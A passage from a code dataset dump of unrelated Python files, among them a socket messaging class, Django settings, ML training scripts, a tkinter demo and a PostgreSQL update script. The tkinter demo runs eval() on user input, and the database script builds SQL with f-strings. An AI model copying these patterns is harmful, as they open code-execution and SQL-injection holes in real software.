on_recv(self, obj):\n return obj\n\n def send_json(self, obj):\n #self.p(\"send:\", obj)\n try:\n c = self.socket.sendall(json.dumps(obj).encode())\n if c:\n raise ConnectionClosed\n\n c = self.socket.sendall(b'\\x00')\n if c:\n raise ConnectionClosed\n except OSError as e:\n if e.errno in (errno.EPIPE, 10053):\n raise ConnectionClosed\n raise e\n\n return 0\n\n def poll(self):\n fd = self.socket.fileno()\n (read, write, err) = select.select([fd], [], [fd], 0.5)\n if read or err:\n return True\n return False\n\n def recv_json(self, block=True):\n if self.queue:\n return json.loads(self.queue.pop(0))\n\n while self.running:\n if self.poll():\n s = None\n try:\n s = self.socket.recv(0x1000)\n except OSError as e:\n if e.errno == errno.EPIPE:\n raise ConnectionClosed\n raise e\n else:\n if not s:\n raise ConnectionClosed\n\n s = str(s, 'utf-8')\n msg = None\n delims = s.count('\\x00')\n if delims > 0:\n msgs = s.split('\\x00')\n if self.buffer.tell() != 0:\n self.buffer.write(msgs.pop(0))\n msg = self.buffer.getvalue()\n self.buffer = StringIO()\n else:\n msg = msgs.pop(0)\n\n # msg 0 msg ; delims = 1, c = 1\n # 0 msg ; delims = 1, c = 1\n # msg 0 msg 0 ; delims = 2, c = 1\n msgs = [m for m in msgs if m]\n if msgs:\n if len(msgs) >= delims:\n self.buffer.write(msgs.pop())\n self.queue = msgs\n else:\n self.queue = msgs\n\n if msg:\n return json.loads(msg)\n else:\n self.buffer.write(s)\n\n if not block:\n return None\n\n return None\n\n def sendmsg(self, msg):\n '''\n try:\n rc = self.send_json(msg.json())\n except ConnectionClosed:\n raise EOFError\n else:\n return rc\n '''\n m = self.on_send(msg.json())\n return self.send_json(m)\n\n def recvmsg(self, block=True):\n obj = self.recv_json(block)\n obj = self.on_recv(obj)\n if obj: \n return self.parse_msg(obj)\n return None\n\n def parse_msg(self, obj):\n if 'status' not in obj:\n raise proto.InvalidMessage(\"missing required field status\")\n\n s = obj['status']\n if s in self.registry:\n return self.registry[s].from_json(obj)\n raise proto.InvalidMessage(\"unknown status \"+s)\n","sub_path":"pypsi/remote/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":5506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"490782","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 4 14:16:25 2020\n\n@author: medrclaa\n\"\"\"\n\n\"\"\"splitting up old arc.py file into individual experiment runs for clarity.\n\n===========\nARC4 Version\n===========\n\nNew version of the above for arc4 using a conda environment for my sanity.\nUse the standard means of cloning the git but use this venv instead.\n\nmodule load anaconda\nconda create -p /nobackup/medrclaa/ukf_py python=3 numpy scipy matplotlib shapely imageio seaborn\nsource activate /nobackup/medrclaa/ukf_py\n\n\nExtract files using usual scp commands\nIf we are accessing arc remotely we have two remote servers \n(one with virtually no storage) to go through so use proxy jump to avoid being\nexcommunicated by the arc team.\n\nShamelessly stolen from :\n\nhttps://superuser.com/questions/276533/scp-files-via-intermediate-host\n\nWith the format:\n\nscp -oProxyJump=user@remote-access.leeds.ac.uk\ne.g.\nscp -oProxyJump=medrclaa@remote-access.leeds.ac.uk medrclaa@arc4.leeds.ac.uk:/nobackup/medrclaa/dust/Projects/ABM_DA/experiments/ukf_experiments/results/agg* /Users/medrclaa/new_aggregate_results\n\n\"\"\"\n\nimport sys\nimport numpy as np\nfrom arc import arc\n\nsys.path.append(\"..\")\nsys.path.append(\"../..\")\nimport modules.default_ukf_gcs_configs as configs\nfrom modules.ex0.ukf_gcs_ex0 import benchmark_params, ex0_save\n\nsys.path.append('../../..')\nsys.path.append('../../../..')\nfrom stationsim.ukf2 import ukf_ss\n\n# %%\n\ndef ex0_parameters(n, parameter_lists, test):\n \"\"\"let the arc task array choose experiment parameters to run\n\n Parameters\n ----------\n test : bool\n if test is true we choose some simple parameters to run on arc.\n this is to test the file works and produces results before running \n a larger batch of jobs to have none of them succeed and 400 abort\n emails.\n \n parameter_lists : list\n `parameter_lists` is a list of lists where each element of the list\n is some set of experiment parameters we wish to run. E.g. this may be\n [10, 1.0, 1] for the first experiment running with 10 agents 100% \n observed.\n\n Returns\n -------\n sample_rate, run_id : int\n `sample_rate` how often we assimilate and unique `run_id` for each n and prop.\n noise : float\n `noise` standard deviation of gaussian noise added to observations\n \"\"\"\n \n if not test:\n sample_rate = parameter_lists[int(sys.argv[1])-1][0]\n noise = parameter_lists[int(sys.argv[1])-1][1]\n run_id = parameter_lists[int(sys.argv[1])-1][2]\n \n #If testing use some fast test parameters.\n else:\n sample_rate = 1\n noise = 1\n run_id = \"test\"\n \n return sample_rate, noise, run_id\n\n\ndef arc_ex0_main(n, parameter_lists, test):\n \"\"\"main function to run ukf experiment 0 on arc.\n \n - load in deault params\n - choose experiment params using taks array\n - update default parameters using benchmark_params and chosen parameters\n - generate filename to save to\n - initatiate arc class and run ukf\n - save results to numpy files\n \n Parameters\n ----------\n n : int\n `n` number of agents\n parameter_lists : list\n `parameter_lists` is a list of lists where each element of the list\n is some set of experiment parameters we wish to run. E.g. this may be\n [10, 1.0, 1] for the first experiment running with 10 agents 100% \n observed.\n test : bool\n if test is true we choose some simple parameters to run on arc.\n this is to test the file works and produces results before running \n a larger batch of jobs to have none of them succeed and 400 abort\n emails.\n \"\"\"\n # load in default params\n ukf_params = configs.ukf_params\n model_params = configs.model_params\n \n if test:\n n = 5\n model_params[\"seed\"] = 8\n model_params[\"step_limit\"] = 100\n \n # load in experiment 1 parameters\n sample_rate, noise, run_id = ex0_parameters(n, parameter_lists, test)\n # update model and ukf parameters for given experiment and its' parameters\n model_params, ukf_params, base_model = benchmark_params(n, \n noise, \n sample_rate, \n model_params, \n ukf_params)\n \n \n #file name to save results to\n file_name = \"gcs_config_agents_{}_rate_{}_noise_{}-{}\".format(\n str(n).zfill(3),\n str(float(sample_rate)),\n str(float(noise)),\n str(run_id).zfill(3)) + \".npy\"\n destination = \"../results/\"\n \n # initiate arc class\n ex0_arc = arc(test)\n arc_args = [ukf_params, model_params, base_model]\n # run ukf_ss filter for arc class\n u = ex0_arc.arc_main(ukf_ss, file_name, *arc_args)\n # save entire ukf class as a pickle\n ex0_arc.arc_save(ex0_save, destination, file_name)\n\nif __name__ == '__main__':\n test = True\n if test:\n print(\"Test set to true. If you're running an experiment, it wont go well.\")\n \n # Lists of parameters to vary over\n n = 30 # 10 to 30 agent population by 10\n sample_rate = [1, 2, 5, 10] # assimilation rates \n noise = [0, 0.25, 0.5, 1, 2, 5] #gaussian observation noise standard deviation\n run_id = np.arange(0, 30, 1) # 30 repeats for each combination of the above parameters\n\n # Assemble lists into grand list of all combinations. \n # Each experiment will use one item of this list.\n parameter_lists = [(x, y, z)\n for x in sample_rate for y in noise for z in run_id]\n arc_ex0_main(n, parameter_lists, test)\n","sub_path":"Projects/ABM_DA/experiments/ukf_experiments/arc/arc_ukf_gcs_ex0.py","file_name":"arc_ukf_gcs_ex0.py","file_ext":"py","file_size_in_byte":5766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"575610540","text":"# Inherit from standard settings file for default\nfrom elemental.settings import *\n\n# The below will override the standard settings\nimport dj_database_url\n\ndb_from_env = dj_database_url.config(conn_max_age=500)\nDATABASES['default'].update(db_from_env)\n\n# honor the X-Forwarded-Proto header for request.is_secure()\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n\n# Allow all host headers\nALLOWED_HOSTS = ['*']\n\n# Set debug to False\nDEBUG = False\n\n# Static asset configuration\n# STATICFILES_STORAGE = 'whitenoise.django.GzipManifestStaticFilesStorage'","sub_path":"elemental/settings_production.py","file_name":"settings_production.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"483613921","text":"\"\"\"\nhttps://arxiv.org/abs/1705.08790\n\"\"\"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\ndef lovasz_grad(gt_sorted):\n p = len(gt_sorted)\n gts = gt_sorted.sum()\n intersection = gts - gt_sorted.float().cumsum(0)\n union = gts + (1 - gt_sorted).float().cumsum(0)\n jaccard = 1 - intersection / union\n if p > 1: # cover 1-pixel case\n jaccard[1:p] = jaccard[1:p] - jaccard[0:-1]\n return jaccard\n\n\ndef hinge(pred, label):\n signs = 2 * label - 1\n errors = 1 - pred * signs\n return errors\n\n\ndef lovasz_loss(preds, labels):\n preds = preds.contiguous().view(-1)\n labels = labels.contiguous().view(-1)\n errors = hinge(preds, labels)\n errors_sorted, perm = torch.sort(errors, dim=0, descending=True)\n perm = perm.data\n gt_sorted = labels[perm]\n grad = lovasz_grad(gt_sorted)\n loss = torch.dot(F.elu(errors_sorted) + 1, grad)\n return loss\n\n\nclass LovaszLoss(nn.Module):\n def __init__(self):\n super().__init__()\n self.loss_fn = lovasz_loss\n\n def forward(self, preds, labels):\n return self.loss_fn(preds, labels)\n","sub_path":"src/losses/binary/lovasz_loss.py","file_name":"lovasz_loss.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"497406152","text":"import tkinter\nimport tkinter.scrolledtext\n\nmain = tkinter.Tk()\n\ndef end():\n main.destroy()\n\ndef pow_2():\n number = entry.get()\n try:\n number = eval(number)\n entry_result_label.configure(text = \"Result: {0}\".format(pow(number, 2)))\n except:\n entry_result_label.configure(text = \"You must give a number\")\n\ndef read_text():\n f = open(\"gui_text.txt\", \"r\")\n line = f.readline()\n while line:\n scrolled_text.insert(\"end\", line)\n normal_text.insert(\"end\", line)\n line = f.readline()\n \n f.close()\n\ndef listbox_single_function():\n listbox_single_label.configure(text = \"Your choice -- > {0}\".format(listbox_single.get(\"active\")))\n\ndef listbox_multiple_function():\n listbox_multiple_label.configure(text = \"Your choices -- > \")\n for selection_index in listbox_multiple.curselection():\n listbox_multiple_label[\"text\"] += \"{0} - \".format(listbox_multiple.get(selection_index))\n\nentry = tkinter.Entry(main)\nentry.pack()\n\nentry_result_label = tkinter.Label(main)\nentry_result_label.configure(text = \"Result: \", fg = \"#ffffff\", bg=\"#000000\", width=70, height=15, font=\"Courier 16 bold\")\nentry_result_label.pack()\n\npow_2_button = tkinter.Button(main)\npow_2_button.configure(text = \"Pow with 2\", command = pow_2)\npow_2_button.pack()\n\nscrolled_text = tkinter.scrolledtext.ScrolledText(main)\nscrolled_text.configure(width = 35, height=10,fg=\"#ffffff\", bg=\"#000000\")\nscrolled_text.pack()\n\nnormal_text = tkinter.Text(main)\nnormal_text.configure(width = 40, height=10,fg=\"#000000\", bg=\"#ffffff\")\nnormal_text.pack()\n\nread_text_button = tkinter.Button(main)\nread_text_button.configure(text = \"Read text\", command = read_text)\nread_text_button.pack()\n\nlistbox_single = tkinter.Listbox(main, height=0)\nlistbox_single.insert(0, \"Hamburg\")\nlistbox_single.insert(0, \"Stuttgart\")\nlistbox_single.insert(0, \"Dortmund\")\nlistbox_single.insert(0, \"Berlin\")\nlistbox_single.pack()\n\nlistbox_single_label = tkinter.Label(main)\nlistbox_single_label.configure(text = \"Your choice -- > \")\nlistbox_single_label.pack()\nlistbox_single_button = tkinter.Button(main)\nlistbox_single_button.configure(text = \"See choice\", command = listbox_single_function)\nlistbox_single_button.pack()\n\nlistbox_multiple = tkinter.Listbox(main, height=0, selectmode = \"multiple\")\nlistbox_multiple.insert(0, \"Hamburg\")\nlistbox_multiple.insert(0, \"Stuttgart\")\nlistbox_multiple.insert(0, \"Dortmund\")\nlistbox_multiple.insert(0, \"Berlin\")\nlistbox_multiple.pack()\n\nlistbox_multiple_label = tkinter.Label(main)\nlistbox_multiple_label.configure(text = \"Your choices -- > \")\nlistbox_multiple_label.pack()\nlistbox_multiple_button = tkinter.Button(main)\nlistbox_multiple_button.configure(text = \"See choices\", command = listbox_multiple_function)\nlistbox_multiple_button.pack()\n\nclose_button = tkinter.Button(main)\nclose_button.configure(text = \"Close\", command = end)\nclose_button.pack()\n\nmain.mainloop()\n","sub_path":"Tk_Toolkit/OldBook/short_summary.py","file_name":"short_summary.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"191652910","text":"import data_holder\n\namt_awarded_to_reg = .0\namt_awarded_to_unreg = .0\ntop5_contractors_and_amount = []\n\n\ndef is_initialized():\n return len(top5_contractors_and_amount) > 0\n\n\ndef init_data():\n if is_initialized():\n return\n\n global amt_awarded_to_reg\n global amt_awarded_to_unreg\n global top5_contractors_and_amount\n\n contractor_dict = data_holder.create_dict_for_list(data_holder.contractors, 'company_name')\n company_awarded_amt_dict = {}\n\n for procurement in data_holder.procurements:\n if not procurement.awarded:\n continue\n\n if procurement.supplier_name in contractor_dict:\n company_awarded_amt_dict.setdefault(procurement.supplier_name, 0)\n company_awarded_amt_dict[procurement.supplier_name] += procurement.awarded_amt\n amt_awarded_to_reg += procurement.awarded_amt\n else:\n amt_awarded_to_unreg += procurement.awarded_amt\n\n sorted_company_names = sorted(company_awarded_amt_dict.keys(),\n key=company_awarded_amt_dict.get,\n reverse=True) # sort keys in descending order based on value of a given key\n # create a list of tuples containing (company_name, total procurement amount)\n top5_contractors_and_amount = map(lambda c: (c, company_awarded_amt_dict[c]), sorted_company_names[:5])\n\n\ndef top_contractors_and_amount():\n init_data()\n return top5_contractors_and_amount\n\n\ndef amount_awarded_to_registered_contractors():\n init_data()\n return amt_awarded_to_reg\n\n\ndef amount_awarded_to_unregistered_contractors():\n init_data()\n return amt_awarded_to_unreg\n\n\ndef function_5():\n result = []\n result.append('====')\n result.append('Top 5 companies with the most tenders:')\n\n top_5_company_name_and_amt = map(lambda company_and_amount: '%s with awarded amount %.2f' % company_and_amount,\n top_contractors_and_amount())\n result.extend(top_5_company_name_and_amt)\n\n result.append('====')\n result.append('Amount awarded to registered contractors: %.2f' % amount_awarded_to_registered_contractors())\n result.append('====')\n result.append('Amount awarded unregistered contractors: %.2f' % amount_awarded_to_unregistered_contractors())\n\n return '\\n'.join(result)\n","sub_path":"function_5.py","file_name":"function_5.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"389696434","text":"'''\nmain_beatsync.py\n\nA file for training frame level chroma and exporting.\nPlease check the MODE and DEVICE first before you run this code.\nFollowing three lines are different compared to 'main_frame.py'.\n\n MODE = 'beatsync'\n EXPORT_DIR = './export/baseline_beatsync_result/'\n acc_test, pred_test = data_manager.frame_accuracy(chord_test, pred_test, info_test, BATCH_SIZE, mode=MODE)\n'''\nimport os\nimport argparse\nimport numpy as np\n\nimport data_manager\nfrom model_wrapper import Wrapper\n\ndef main():\n #Directory Settings\n DATASET_DIR = './dataset/'\n EXPORT_DIR = './export/CNN_range/'\n\n #Parameter Settings\n MODE = 'beatsync'\n DEVICE = 1 # 0 : cpu, 1 : gpu0, 2 : gpu1, ...\n NUM_CLASS = 25 # 0 : Silence, 1 - 12: Major, 13 - 24: Minor, Don't change this parameter\n EPOCH = 60\n BATCH_SIZE = 128\n LEARN_RATE = 0.01\n SEQ_LENGTH = 10\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--export_dir', type=str, default=EXPORT_DIR, help='export directory')\n parser.add_argument('--mode', type=str, default=MODE, help='which mode? frame or beatsync')\n parser.add_argument('--device', type=int, default=DEVICE, help='which device? 0 : cpu, over 1 : gpu')\n parser.add_argument('--epoch', type=int, default=EPOCH, help='how many epoch?')\n parser.add_argument('--batch_size', type=int, default=BATCH_SIZE, help='how many batch?')\n parser.add_argument('--learn_rate', type=float, default=LEARN_RATE, help='learning rate')\n parser.add_argument('--seq_length', type=int, default=SEQ_LENGTH, help='CNN sequence length')\n args = parser.parse_args()\n EXPORT_DIR = args.export_dir\n MODE = args.mode\n DEVICE = args.device\n EPOCH = args.epoch\n BATCH_SIZE = args.batch_size\n LEARN_RATE = args.learn_rate\n SEQ_LENGTH = args.seq_length\n\n #Preprocess\n x, y, info_test = data_manager.preprocess(DATASET_DIR, BATCH_SIZE, SEQ_LENGTH, mode=MODE)\n total_batch = float(x.train.shape[0] + x.test.shape[0] + x.valid.shape[0])\n print('Data Loaded\\n'\n + 'Train Ratio : ' + str(round(100*x.train.shape[0]/total_batch, 2))\n + '%, Test Ratio : ' + str(round(100*x.test.shape[0]/total_batch, 2))\n + '%, Valid Ratio : ' + str(round(100*x.valid.shape[0]/total_batch, 2)) + '%')\n\n acc_train = np.zeros(EPOCH)\n acc_valid = np.zeros(EPOCH)\n loss_train = np.zeros(EPOCH)\n loss_valid = np.zeros(EPOCH)\n\n #Train\n print('\\n--------- Training Start ---------')\n wrapper = Wrapper(x.train.shape[-1], NUM_CLASS, LEARN_RATE)\n #wrapper.model.cuda(device=DEVICE-1)\n # x = minibatch x batchsize x chroma // y = minibatch x batchsize\n\n for e in range(EPOCH):\n shuff_train = np.arange(x.train.shape[0])\n np.random.shuffle(shuff_train)\n shuff_valid = np.arange(x.valid.shape[0])\n np.random.shuffle(shuff_valid)\n _, acc_train[e], loss_train[e] = wrapper.run_model(x.train[shuff_train], y.train[shuff_train], DEVICE, 'train')\n _, acc_valid[e], loss_valid[e] = wrapper.run_model(x.valid[shuff_valid], y.valid[shuff_valid], DEVICE, 'eval')\n #_, acc_train[e], loss_train[e] = wrapper.run_model(x.train, y.train, DEVICE, 'train')\n #_, acc_valid[e], loss_valid[e] = wrapper.run_model(x.valid, y.valid, DEVICE, 'eval')\n if wrapper.early_stop(loss_valid[e]): break\n\n print('Epoch [' + str(e+1).zfill(3) + '/' + str(EPOCH) + ']'\n + ' acc : ' + str(round(acc_train[e],4)) + ' - val_acc : ' + str(round(acc_valid[e],4))\n + ' | loss : ' + str(round(loss_train[e],4)) + ' - val_loss : ' + str(round(loss_valid[e],4)))\n print('-------- Training Finished -------')\n\n #Test\n pred_test, _, _ = wrapper.run_model(x.test, y.test, DEVICE, 'eval')\n\n chroma_test = data_manager.batch_dataset(info_test.chroma, BATCH_SIZE)\n chord_test = data_manager.batch_dataset(info_test.chord, BATCH_SIZE)\n chroma_test = chroma_test.reshape(chroma_test.shape[0] * chroma_test.shape[1], chroma_test.shape[-1])\n chord_test = chord_test.reshape(chord_test.shape[0] * chord_test.shape[1])\n\n acc_test, pred_test = data_manager.frame_accuracy(chord_test, pred_test, info_test, BATCH_SIZE, mode=MODE)\n print('\\nTest Accuracy : ' + str(round(100 * acc_test, 2)) + '%')\n\n # Export\n wrapper.export(EXPORT_DIR, chroma_test, chord_test, pred_test, acc_test)\n print('Exported files to ' + os.path.abspath(EXPORT_DIR))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"hw3_20185319/main_beatsync.py","file_name":"main_beatsync.py","file_ext":"py","file_size_in_byte":4426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"458358226","text":"from django.contrib.postgres.fields import JSONField\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom .attribute import Attribute\n\n\nclass ProjectType(models.Model):\n name = models.CharField(max_length=255, verbose_name=_('name'))\n\n class Meta:\n verbose_name = _('project type')\n verbose_name_plural = _('project types')\n\n def __str__(self):\n return self.name\n\n\nclass Project(models.Model):\n created_at = models.DateTimeField(verbose_name=_('created at'), auto_now_add=True, editable=False)\n modified_at = models.DateTimeField(verbose_name=_('modified at'), auto_now=True, editable=False)\n name = models.CharField(max_length=255, verbose_name=_('name'))\n type = models.ForeignKey(ProjectType, verbose_name=_('type'), related_name='projects', on_delete=models.PROTECT)\n attribute_data = JSONField(verbose_name=_('attribute data'), default=dict, blank=True, null=True)\n\n class Meta:\n verbose_name = _('project')\n verbose_name_plural = _('projects')\n\n def __str__(self):\n return self.name\n\n\nclass ProjectPhase(models.Model):\n name = models.CharField(max_length=255, verbose_name=_('name'))\n color = models.CharField(max_length=64, verbose_name=_('color'), blank=True)\n project_type = models.ForeignKey(ProjectType, verbose_name=_('project type'), on_delete=models.CASCADE)\n index = models.PositiveIntegerField(verbose_name=_('index'), null=True, blank=True)\n attributes = models.ManyToManyField(\n Attribute, verbose_name=_('attributes'), related_name='project_phases', through='ProjectPhaseAttribute'\n )\n\n class Meta:\n verbose_name = _('project phase')\n verbose_name_plural = _('project phases')\n unique_together = ('project_type', 'index')\n\n def __str__(self):\n return self.name\n\n\nclass ProjectPhaseAttribute(models.Model):\n attribute = models.ForeignKey(Attribute, verbose_name=_('attribute'), on_delete=models.CASCADE)\n phase = models.ForeignKey(ProjectPhase, verbose_name=_('phase'), on_delete=models.CASCADE)\n required = models.BooleanField(verbose_name=_('required'))\n index = models.PositiveIntegerField(verbose_name=_('index'), null=True, blank=True)\n\n class Meta:\n verbose_name = _('project phase attribute')\n verbose_name_plural = _('project phase attributes')\n\n def __str__(self):\n return '{} {} {}'.format(self.attribute, self.phase, self.index)\n","sub_path":"projects/models/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"171084155","text":"from configs import *\nimport psycopg2\nimport csv\n\n\n\nif __name__ == \"__main__\":\n \"\"\"\n The below operations are responsible to find the users in the database upon firstname and lastname. Each matched instance is updated with a medals attribute.\n 1 - GOLD\n 2 - SILVER\n 3 - BRONZE\n \"\"\"\n\n file_name = sys.argv[1]\n\n try:\n conn = psycopg2.connect(host=host, user=user, password=password, dbname=dbname)\n\n failers = []\n with open(file_name) as file:\n reader = csv.reader(file, delimiter='\\t')\n cursor = conn.cursor()\n\n for row in reader:\n splitted_ones = row[0].split()\n \n first_name, *last_name = splitted_ones\n last_name = \" \".join(last_name)\n \n # we check wheter we have combined > 2 named people\n query = f\"select * from users where first_name='{first_name}' and last_name='{last_name}';\"\n cursor.execute(query)\n result = cursor.fetchall()\n if not result:\n # if not we try vice versa\n *first_name, last_name = splitted_ones \n first_name = \" \".join(first_name)\n \n medal = row[1]\n \n query_update = f\"update users set medals={medal} where first_name='{first_name}' and last_name='{last_name}';\"\n cursor.execute(query_update)\n\n query = f\"select * from users where first_name='{first_name}' and last_name='{last_name}';\"\n cursor.execute(query)\n result = cursor.fetchall()\n\n if result:\n print(result)\n else:\n failers.append(first_name + \" \" + last_name)\n \n print('Commiting changes')\n conn.commit()\n \n except:\n pass\n\n finally:\n print('Closing cursor')\n cursor.close()\n\n print('Closing connection')\n conn.close()\n\n print('Printing failures:')\n for failer in failers:\n print(failer)\n","sub_path":"automation_scripts/data_manipulation/update_medals_attribute.py","file_name":"update_medals_attribute.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"269368741","text":"'''\nCreated on Feb 21, 2013\n\n@author: shengchao\n'''\nimport unittest\nfrom DataParse import Parser\nfrom DataParse import QueryingData\n\nclass ContinentTest(unittest.TestCase):\n \n Parser.Parser()\n \n def testHKGinAsia(self):\n key = False\n for city in QueryingData.asia:\n if city == 'Hong Kong':\n key = True\n self.assertEqual(key, True)\n \n def testSCLinSouthAmercia(self):\n key = False\n for city in QueryingData.southAmerica:\n if city == 'Santiago':\n key = True\n self.assertEqual(key, True)\n \n def testMEXinNorthAmerica(self):\n key = False\n for city in QueryingData.northAmerica:\n if city == 'Mexico City':\n key = True\n self.assertEqual(key, True)\n \n def testMADinEurope(self):\n key = False\n for city in QueryingData.europe:\n if city == 'Madrid':\n key = True\n self.assertEqual(key, True)\n \n def testLOSinAfrica(self):\n key = False\n for city in QueryingData.africa:\n if city == 'Lagos':\n key = True\n self.assertEqual(key, True)\n \n ","sub_path":"Assignment2.0/src/Test/ContinentTest.py","file_name":"ContinentTest.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"251024871","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom tornado.options import define, options\n\n# 监听端口\ndefine(\n \"port\",\n default=8999,\n help=\"端口运行\",\n type=int\n)\n\n# 配置\nsettings = {\n 'debug': True,\n 'static_path': os.path.join(os.getcwd(), 'static'),\n 'template_path': os.path.join(os.getcwd(), 'templates'),\n}","sub_path":"app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"409377961","text":"#\n# Warning! Changing frequencies will disconnect the USB link but the \n# tests will continue.\n# Simply reset the Meowbit and reload MicroPython and get the results\n# in results.csv on th flash or on the SD card\n#\n\nimport pyb\nimport framebuf\nimport time\n\ndef average(lst): \n return sum(lst) / len(lst) \n\ndef compute_time(fb):\n gtime = time.ticks_us\n tft = pyb.SCREEN()\n blit = tft.show\n\n t0 = gtime()\n blit(fb)\n t1 = gtime()\n dt = time.ticks_diff(t1, t0)\n\n return dt\n\ndef run_tests(freqs, fb):\n print(\"Starting tests...\")\n pyb.freq(freqs[0], freqs[1], freqs[2], freqs[3])\n\n dt = []\n for i in range(0,10):\n dt.append(compute_time(fb))\n\n avg_dt = average(dt)\n return avg_dt\n\n# reserve the biggest buffer needed. To avoid gc...\nfbuf = bytearray(160*128*2)\nresults_str = \"type;freqs;average\\n\"\n\n# Default frequencies. Refer to the STM32F4 User Manual for limits\n#sysclk: frequency of the CPU\t\t\t\t: 56000000 \n#hclk: frequency of the AHB bus, core memory and DMA\t: 56000000\n#pclk1: frequency of the APB1 bus\t\t\t: 14000000\n#pclk2: frequency of the APB2 bus\t\t\t: 28000000\n\nfreqs_test = [\n [56000000, 56000000, 14000000, 28000000],\n [84000000, 84000000, 42000000, 84000000]\n]\n\nprint(\"Loading RGB565 image...\")\nfb565 = framebuf.FrameBuffer(fbuf, 160, 128, framebuf.RGB565)\nf = open(\"images/test.r565\", \"rb\")\nf.readinto(fbuf)\nf.close()\n\nfor freqs in freqs_test:\n avg_dt = run_tests(freqs, fb565)/1000\n print(\"At freqs {}, average blit time: {}ms\".format(freqs, avg_dt))\n results_str += \"{};{};{}\\n\".format(\"rgb565\", freqs, avg_dt)\n\nprint(\"Loading PAL256 image...\")\nfb256 = framebuf.FrameBuffer(fbuf, 160, 128, framebuf.PAL256, 160, framebuf.PAL256_884)\nf = open(\"images/test.p256\", \"rb\")\nf.readinto(fbuf)\nf.close()\n\nfor freqs in freqs_test:\n avg_dt = run_tests(freqs, fb256)/1000\n print(\"At freqs {}, average blit time: {}ms\".format(freqs, avg_dt))\n results_str += \"{};{};{}\\n\".format(\"pal256\", freqs, avg_dt)\n\nprint(\"Loading PAL16 image...\")\nfb16 = framebuf.FrameBuffer(fbuf, 160, 128, framebuf.PAL16, 160, framebuf.PAL16_C64)\nf = open(\"images/test.p16\", \"rb\")\nf.readinto(fbuf)\nf.close()\n\nfor freqs in freqs_test:\n avg_dt = run_tests(freqs, fb16)/1000\n print(\"At freqs {}, average blit time: {}ms\".format(freqs, avg_dt))\n results_str += \"{};{};{}\\n\".format(\"pal16\", freqs, avg_dt)\n\nprint(results_str)\n\nwith open(\"results.csv\", \"w\") as text_file:\n print(\"{}\".format(results_str), file=text_file)\n\nprint(\"Done!!!\")\n\n\n\n","sub_path":"examples/meowbit/blit_bench.py","file_name":"blit_bench.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"482016789","text":"import os\nfrom utils import yaml_stream\nfrom sqlalchemy import Table\n\n\ndef importyaml(connection, metadata, source_path):\n skinLicense = Table('skinLicense', metadata)\n skinMaterials = Table('skinMaterials', metadata)\n skins_table = Table('skins', metadata)\n skinShip = Table('skinShip', metadata)\n\n trans = connection.begin()\n print(\"Importing Skins\")\n\n with open(\n os.path.join(source_path, 'fsd', 'skins.yaml'), 'r'\n ) as yamlstream:\n for skin in yaml_stream.read_by_any(yamlstream):\n for skin_id, skin_details in skin.items():\n connection.execute(\n skins_table.insert(),\n skinID=skin_id,\n internalName=skin_details.get('internalName', ''),\n skinMaterialID=skin_details.get('skinMaterialID', '')\n )\n for ship in skin_details['types']:\n connection.execute(\n skinShip.insert(),\n skinID=skin_id,\n typeID=ship\n )\n\n print(\"opening Yaml2\")\n with open(\n os.path.join(source_path, 'fsd', 'skinLicenses.yaml'), 'r'\n ) as yamlstream:\n for skin_license in yaml_stream.read_by_any(yamlstream):\n for skin_license_id, skin_license_details in skin_license.items():\n connection.execute(\n skinLicense.insert(),\n licenseTypeID=skin_license_id,\n duration=skin_license_details['duration'],\n skinID=skin_license_details['skinID']\n )\n\n print(\"opening Yaml3\")\n with open(\n os.path.join(source_path, 'fsd', 'skinMaterials.yaml'), 'r'\n ) as yamlstream:\n for skin_material in yaml_stream.read_by_any(yamlstream):\n for skin_material_id, skin_material_details in skin_material.items():\n connection.execute(\n skinMaterials.insert(),\n skinMaterialID=skin_material_id,\n displayNameID=skin_material_details['displayNameID'],\n materialSetID=skin_material_details['materialSetID']\n )\n\n trans.commit()\n","sub_path":"tableloader/tableFunctions/skins.py","file_name":"skins.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"194595309","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 23 11:38:57 2020\nCalculates point estimates from treadmill kinetic data\n@author: Daniel.Feeney\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport scipy.signal as sig\nimport seaborn as sns\n\n# Define constants and options\nfThresh = 80; #below this value will be set to 0.\nwriteData = 